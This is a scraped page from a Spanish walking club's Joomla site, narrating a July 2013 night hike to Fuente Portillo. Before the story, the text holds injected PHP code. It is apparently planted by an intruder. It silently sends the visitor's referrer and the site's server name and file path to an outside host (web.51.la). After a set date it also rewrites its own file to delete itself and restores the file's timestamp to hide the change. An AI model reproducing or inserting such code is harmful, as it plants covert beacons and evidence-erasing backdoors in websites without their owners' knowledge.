check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Con la Luna casi llena en Fuente Portillo

La Afición

Calendario

<<  Agosto 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
   1  2  3  4  5  6
  7  8  910111213
14151617181920
21222324252627
28293031   
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Con la Luna casi llena en Fuente Portillo PDF Imprimir E-mail
Martes, 23 de Julio de 2013 22:17

Con gran expectación por parte de los andarines del C D Silos y algunos amigos del Club, el sábado 20 de julio tiene lugar la primera marcha nocturna.

La hora de salida 21:30 estamos: Juanito (ágil guía local) con su inseparable Chumba, Raquel, Visi, Eusebio, Ana Rosa, Lourdes, Alex, Elena, Antonio, Andrea, Vero, César, Kamila,  Rafa y Marta (Andarines de Hortezuelos), Isa y Fernando (Andarines Arandinos) y Marina con mucho entusiasmo enganchada a última hora en la Plaza, ya casi saliendo.

La noche no pintaba demasiado bonita, ya que la lluvia pasó de ser una amenaza, a convertirse en realidad, pero esto no desanimaba a nadie e incluso lo encontrábamos gracioso, un poco de hidratación extra. La gente presente en la plaza miraba con cara de “¿Pero estos dónde van con este tiempo y a esta hora?”

Todos juntos nos encaminamos hacía el Arco de la Calderera, donde paramos para inmortalizar el momento, ya que todavía no  había anochecido por completo. Las nubes se apiadaron de nosotros y poco a poco dejó de llover incluso empezamos a ver la luna casi llena.

En la primera ascensión nos paramos para admirar una de las grandes encinas centenarias, que tenemos en nuestra zona. Seguíamos subiendo y como la noche a veces confunde, a nuestro gran sherpa local que nunca duda, le costó encontrar el siguiente desvío. Pero como Juanito conoce el monte como nadie, finalmente salimos donde teníamos que salir.

La marcha seguía a un buen ritmo, los ojos estaban ya acostumbrados a la oscuridad y la luna ayudaba mucho, aunque algunos andarines echaron mano de linternas. Todo el mundo charlaba animadamente, pero ha llegado la mayor cuesta de la Ermita de San Cristóbal, donde se pararon las conversaciones y solamente se escuchaba la respiración entrecortada. Y alguno que otro se paraba a apreciar el paisaje (descansar algo y tomarse un respiro).

Llegamos arriba a un punto donde las vistas eran magníficas, empezamos a disfrutar de la esencia de una marcha nocturna: Adivinar qué pueblo podía ser cada uno, por la situación y cantidad de luces que se veían, aquí se da cuenta uno de lo privilegiado de nuestro entorno, tanto de día como de noche las vistas son espectaculares.

Por fin llegamos a nuestro destino Fuente Portillo bien cuidado por Juanito, que fácil es encontrar la fuente cuando te guían hacía ella, pero que difícil sin ayuda del experto, cuantos del pueblo han intentado localizarla sin éxito.

Llega el esperado momento de avituallamiento, pero como es tradición Eusebio=Agua y Agua=Eusebio y a falta de agua del cielo, nos viene agua del suelo, obviamente evadir este chaparrón de noche es más difícil, así que algunos acaban calados. Panzas algo más llenas, momento foto, algo de tranquilidad y sed de venganza: Alex contraataca, se balancean con Eusebio sobre la fuente cual lucha greco-romana, se calan y acaban encima de la mochila de Elena.

Seguimos nuestra marcha de vuelta, camino a Merandilla, según vamos subiendo, vemos más y más pueblos, un mar de luces, a veces discutimos que pueblos son.

El camino lo dificulta la superficie, muchas piedras de punta, lo que hace que el grupo se disperse, de vez en cuando nos reagrupamos para no perdernos. A mitad del camino nos esperan en el coche “escoba” David y Roberto por si alguien lo necesitará, pero todos deciden seguir incluso los más perjudicados por la apresurada elección del calzado.

Finalmente llegamos al camino Merandilla, todos sabemos que es bajada y encima parece una autopista, por la claridad y el firme, aquí algunos aceleran el paso y el grupo se dispersa de nuevo.

 

En el depósito esperamos a que lleguen todos y juntos bajamos a la Plaza, para despedirnos. La gente comenta, lo bien que se lo ha pasado y lo diferente que ha sido esta experiencia, para muchos la primera de este tipo. Es fantástico que nuevas personas se animen a participar en este tipo de actividades. Por ello una vez más desde el Club os animamos a no perder la oportunidad de disfrutar de lo que nos rodea y a la vez de una buena compañía y si a demás hacemos algo de ejercicio, que más se puede pedir. ¡¡¡Te esperamos en la siguiente!!!

 
Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.